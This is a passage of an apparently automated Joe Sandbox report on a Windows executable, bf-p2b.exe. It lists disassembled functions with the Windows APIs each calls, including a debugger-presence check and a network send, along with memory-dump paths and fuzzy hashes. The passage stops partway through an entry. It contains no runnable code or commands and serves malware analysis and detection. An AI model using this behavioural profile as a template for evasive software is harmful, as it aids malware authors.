                          • Opcode Fuzzy Hash: ffe1a3b1de71860dc1b3f1f76db010a7c77d935f2fc26cd8cd2e409868b2b804
                          • Instruction Fuzzy Hash: D87189B59012418BC318EF6EA8A0D94BBE4FB9E3453944DAED00AB73A3CF708854CF55
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B04010 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: _memmove
                          • String ID: EA06
                          • API String ID: 4104443479-3962188686
                          • Opcode ID: cf12ba43cbc7aa81a4888bfdc4606b2c9dd6c95e231187def038cf6e32628ea4
                          • Instruction ID: 77ceb5108288510f6d17b8151ed90f1a8183d8e98fff1b87b8ede75dfa7acb83
                          • Opcode Fuzzy Hash: cf12ba43cbc7aa81a4888bfdc4606b2c9dd6c95e231187def038cf6e32628ea4
                          • Instruction Fuzzy Hash: 55417BF1A041589BDB219B6488927BF7FE2DF15300F1844E5EB82FB1C3D7618D8483A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B5013F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: _wcscmp
                          • String ID: 0.0.0.0
                          • API String ID: 856254489-3771769585
                          • Opcode ID: df2bd9c6ff22437f0a62cb9bc5d6cab5609193df364278e0c9e0efa8079b1f5e
                          • Instruction ID: 813eb58f145528646d459c9c855f56f6b01da139d8710a998917e2d9d6d55d1d
                          • Opcode Fuzzy Hash: df2bd9c6ff22437f0a62cb9bc5d6cab5609193df364278e0c9e0efa8079b1f5e
                          • Instruction Fuzzy Hash: 3E11E035700604EBCB14EF25CAC1E69B3E9AF94710B1480D9FA05BF391DA70EE85DBA5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B03BFF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54COMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 00B73CF1
                            • Part of subcall function 00B031B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00B031DA
                            • Part of subcall function 00B03A67: SHGetMalloc.SHELL32(00B03C31), ref: 00B03A7D
                            • Part of subcall function 00B03A67: SHGetDesktopFolder.SHELL32(?), ref: 00B03A8F
                            • Part of subcall function 00B03A67: SHGetPathFromIDListW.SHELL32(?,?), ref: 00B03AD2
                            • Part of subcall function 00B03B45: GetFullPathNameW.KERNEL32(?,00000104,?,?,00BC22E8,?), ref: 00B03B65
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Path$FullName$DesktopFolderFromListMalloc_memset
                          • String ID: X
                          • API String ID: 2727075218-3081909835
                          • Opcode ID: 319ac2ba478a3b82ec26ec3e4af6ab5fc83ba99f7222d5a1002dc0628d372217
                          • Instruction ID: ca9370463a7f5e03b6ea57fd67cb52498a520a5c9fdc7c5c7bcb5ea37309910b
                          • Opcode Fuzzy Hash: 319ac2ba478a3b82ec26ec3e4af6ab5fc83ba99f7222d5a1002dc0628d372217
                          • Instruction Fuzzy Hash: A9117B71A102586BCF05DF98D8496DE7FFDEF46B04F04404AE401BB281DBF556498BA5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B034C1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39COMMON
                          Download Yara Rule
                          Strings
                          • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 00B734AA
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: LibraryLoad
                          • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                          • API String ID: 1029625771-2684727018
                          • Opcode ID: cf0d26797aec6136aab3d5fa3603d30c0033faad634260ff652f652c48fca55a
                          • Instruction ID: 52fefa0e4da8bed5cf53ea35c25b648d39eb409600c52d68dfbef1f0f925e5b6
                          • Opcode Fuzzy Hash: cf0d26797aec6136aab3d5fa3603d30c0033faad634260ff652f652c48fca55a
                          • Instruction Fuzzy Hash: 37F0497190410DAACF15EFB0D8958FFBBFCAE10710B1085A6A426911D2DB749B09D720
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B4EFCD Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 261COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B478AD: GetFullPathNameW.KERNEL32(?,00000105,?,?), ref: 00B478CB
                          • CoInitialize.OLE32(00000000), ref: 00B4F04D
                            • Part of subcall function 00B084A6: __swprintf.LIBCMT ref: 00B084E5
                            • Part of subcall function 00B084A6: __itow.LIBCMT ref: 00B08519
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: FullInitializeNamePath__itow__swprintf
                          • String ID: .lnk
                          • API String ID: 35104896-24824748
                          • Opcode ID: e86e0e882b21ff2d7e4959809f0b724fa4d215af217a7f416dcae3fc57321210
                          • Instruction ID: 840fa618d3bcc0fc06800e1ff1a820fb1862fb0de6ad5cd0093c0a958475c17d
                          • Opcode Fuzzy Hash: e86e0e882b21ff2d7e4959809f0b724fa4d215af217a7f416dcae3fc57321210
                          • Instruction Fuzzy Hash: 45A149756043029FCB14DF14C884D6ABBE5FF89320F158999F896AB3A1CB31EE45CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B1F461 Relevance: 3.2, APIs: 2, Instructions: 159COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5a2844fa6970f88d0881cb49d4ddc206cb532d62a01fbc7b7174eca484eb47cb
                          • Instruction ID: 4215ea2ca4e157673aa162a75d0daafce6131cf762d9479423ef83d13a67fbfd
                          • Opcode Fuzzy Hash: 5a2844fa6970f88d0881cb49d4ddc206cb532d62a01fbc7b7174eca484eb47cb
                          • Instruction Fuzzy Hash: 8C5191316047029FCB14EF28D491BAA77E5EF48310F5485EDF9AA8B2D2DB30E945CB52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B58065 Relevance: 3.1, APIs: 2, Instructions: 98COMMON
                          Download Yara Rule
                          APIs
                          • GetCursorPos.USER32(?), ref: 00B58074
                          • GetForegroundWindow.USER32 ref: 00B5807A
                            • Part of subcall function 00B56B19: GetWindowRect.USER32(?,?), ref: 00B56B2C
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Window$CursorForegroundRect
                          • String ID:
                          • API String ID: 1066937146-0
                          • Opcode ID: 027caea322cda30ad093408cefd6297a2fc77d9fa14ae7ec3d9c533f0e1a81e6
                          • Instruction ID: 92bcb4c67fd6f125cb8eb1bf2189f47a14de92ecf23951d4dc07926cbeb00602
                          • Opcode Fuzzy Hash: 027caea322cda30ad093408cefd6297a2fc77d9fa14ae7ec3d9c533f0e1a81e6
                          • Instruction Fuzzy Hash: BF311A75900208AFDB00EFA4C881AEEB7F9FF18314F5044AAE956B7251DB34AE55CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B01DCE Relevance: 3.1, APIs: 2, Instructions: 71COMMON
                          Download Yara Rule
                          APIs
                          • IsWindow.USER32(00000000), ref: 00B7DB31
                          • IsWindow.USER32(00000000), ref: 00B7DB6B
                            • Part of subcall function 00B01F04: GetForegroundWindow.USER32 ref: 00B01FBE
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Window$Foreground
                          • String ID:
                          • API String ID: 62970417-0
                          • Opcode ID: c2d8707ba48684b2171bc3720692e1a6c3dcd9314be71b728bbdbf784c7f9532
                          • Instruction ID: 1f328651e02a00910c5dbca78cc5ac2f1da457dd8a337c0ec40f00e00c499d60
                          • Opcode Fuzzy Hash: c2d8707ba48684b2171bc3720692e1a6c3dcd9314be71b728bbdbf784c7f9532
                          • Instruction Fuzzy Hash: A921A572600206ABDB15AB74C891FFE7BE9DF80784F0148A9F95A87191DF70EE05D760
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B3E2E8 Relevance: 3.1, APIs: 2, Instructions: 69windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B0193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00B01952
                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00B3E344
                          • _strlen.LIBCMT ref: 00B3E34F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: MessageSend$Timeout_strlen
                          • String ID:
                          • API String ID: 2777139624-0
                          • Opcode ID: c297dc66a28556305fd1b51037b330b19343f073d80eed5c2dd942234e88c7c8
                          • Instruction ID: 0e9185980fb9b14fadea121c4f1a02e0f28bbc48cbec95ea2dad4234f72ee604
                          • Opcode Fuzzy Hash: c297dc66a28556305fd1b51037b330b19343f073d80eed5c2dd942234e88c7c8
                          • Instruction Fuzzy Hash: CF11A3316002046BDB05BB68ECC6DBE7BE9DF45340F1044BAF60ADB1E2DE64E84687A4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B03682 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                          Download Yara Rule
                          APIs
                          • 745EC8D0.UXTHEME ref: 00B036E6
                            • Part of subcall function 00B22025: __lock.LIBCMT ref: 00B2202B
                            • Part of subcall function 00B032DE: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00B032F6
                            • Part of subcall function 00B032DE: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00B0330B
                            • Part of subcall function 00B0374E: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 00B0376D
                            • Part of subcall function 00B0374E: IsDebuggerPresent.KERNEL32(?,?), ref: 00B0377F
                            • Part of subcall function 00B0374E: GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\bf-p2b.exe,00000104,?,00BC1120,C:\Users\user\Desktop\bf-p2b.exe,00BC1124,?,?), ref: 00B037EE
                            • Part of subcall function 00B0374E: SetCurrentDirectoryW.KERNEL32(?), ref: 00B03860
                          • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 00B03726
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: InfoParametersSystem$CurrentDirectory$DebuggerFullNamePathPresent__lock
                          • String ID:
                          • API String ID: 3809921791-0
                          • Opcode ID: c5a46c5917f16b82de217f0ce07a52bc99ab7e11426f122fa8f4ac51ed9f07de
                          • Instruction ID: 302ec271e158f76177c532f9e534459d7f5dbe4fa02d5ea1db9b37a8797e1f72
                          • Opcode Fuzzy Hash: c5a46c5917f16b82de217f0ce07a52bc99ab7e11426f122fa8f4ac51ed9f07de
                          • Instruction Fuzzy Hash: C4116A719083419FC300DF29E949D5ABBE9FB99710F00895EF484972B2DB709984CB96
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B04B88 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000001,?,00B04C2B,?,?,?,?,00B0BE63), ref: 00B04BB6
                          • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000001,?,00B04C2B,?,?,?,?,00B0BE63), ref: 00B74972
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: CreateFile
                          • String ID:
                          • API String ID: 823142352-0
                          • Opcode ID: 250bc5cc2082522ac7e7d6d329366bb567897e83cfd6fd7a03b55ffff8db6ec5
                          • Instruction ID: d954b91565146e404559b58ca721c8dae4063ef45a330418e970743fe3c4ff15
                          • Opcode Fuzzy Hash: 250bc5cc2082522ac7e7d6d329366bb567897e83cfd6fd7a03b55ffff8db6ec5
                          • Instruction Fuzzy Hash: 80016DB0244208BEF2245E248CCAF667BDCEB057A8F108399BBE56A1E0C7B09C448B50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B1F26B Relevance: 3.1, APIs: 2, Instructions: 52COMMON
                          Download Yara Rule
                          APIs
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00B4AEA5,?,?,00000000,00000008), ref: 00B1F282
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00B4AEA5,?,?,00000000,00000008), ref: 00B1F2A6
                            • Part of subcall function 00B1F2D0: _memmove.LIBCMT ref: 00B1F307
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide$_memmove
                          • String ID:
                          • API String ID: 3033907384-0
                          • Opcode ID: b65ed3f47cc2aa33350b72b0e6713418bd007c6f3125b7f81ead1b3813628c6d
                          • Instruction ID: 89a19919612754956555fe33ba8e4331268f2c8458ebac8e81f72fb126b0cde8
                          • Opcode Fuzzy Hash: b65ed3f47cc2aa33350b72b0e6713418bd007c6f3125b7f81ead1b3813628c6d
                          • Instruction Fuzzy Hash: F0F03CB6114114BFAB10BB65AC88DBB7BEDEF8A3607808066FD08DA151CA35DC40C7B4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B2F782 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • ___lock_fhandle.LIBCMT ref: 00B2F7D9
                          • __close_nolock.LIBCMT ref: 00B2F7F2
                            • Part of subcall function 00B2886A: __getptd_noexit.LIBCMT ref: 00B2886A
                            • Part of subcall function 00B2889E: __getptd_noexit.LIBCMT ref: 00B2889E
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                          • String ID:
                          • API String ID: 1046115767-0
                          • Opcode ID: d7fcf11fe73cd518898964a06c768f8ef3a33b851a419a64d8c93e8a2d942737
                          • Instruction ID: 1d43e11a488b36b4c68cd54a3f135edcd605985a97ced1ca3441a3b78c97dc6f
                          • Opcode Fuzzy Hash: d7fcf11fe73cd518898964a06c768f8ef3a33b851a419a64d8c93e8a2d942737
                          • Instruction Fuzzy Hash: 23115E32816671CAD7117BA8B882768B6E09F45331F5502E0E56C5F2E2CFB45D4086A5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B034F3 Relevance: 3.0, APIs: 2, Instructions: 49COMMON
                          Download Yara Rule
                          APIs
                          • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00B0352A
                            • Part of subcall function 00B07E53: _memmove.LIBCMT ref: 00B07EB9
                          • _wcscat.LIBCMT ref: 00B766C0
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: FullNamePath_memmove_wcscat
                          • String ID:
                          • API String ID: 257928180-0
                          • Opcode ID: 3831cbb71cf25fff6cc54c6487be1229b1d8a05149e498dc2167d1e44de848e8
                          • Instruction ID: dda7068bb09c851d02f91f970f263077c7208b490544e2c8fa045a843b2808e8
                          • Opcode Fuzzy Hash: 3831cbb71cf25fff6cc54c6487be1229b1d8a05149e498dc2167d1e44de848e8
                          • Instruction Fuzzy Hash: D301617594410CAACF00EBA4DC49ED97BFDEF24748F0085E5A915E31E1EE309B858B51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B59500 Relevance: 3.0, APIs: 2, Instructions: 46networkCOMMON
                          Download Yara Rule
                          APIs
                          • send.WS2_32(00000000,?,00000000,00000000), ref: 00B59534
                          • WSAGetLastError.WS2_32(00000000,?,00000000,00000000), ref: 00B59557
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
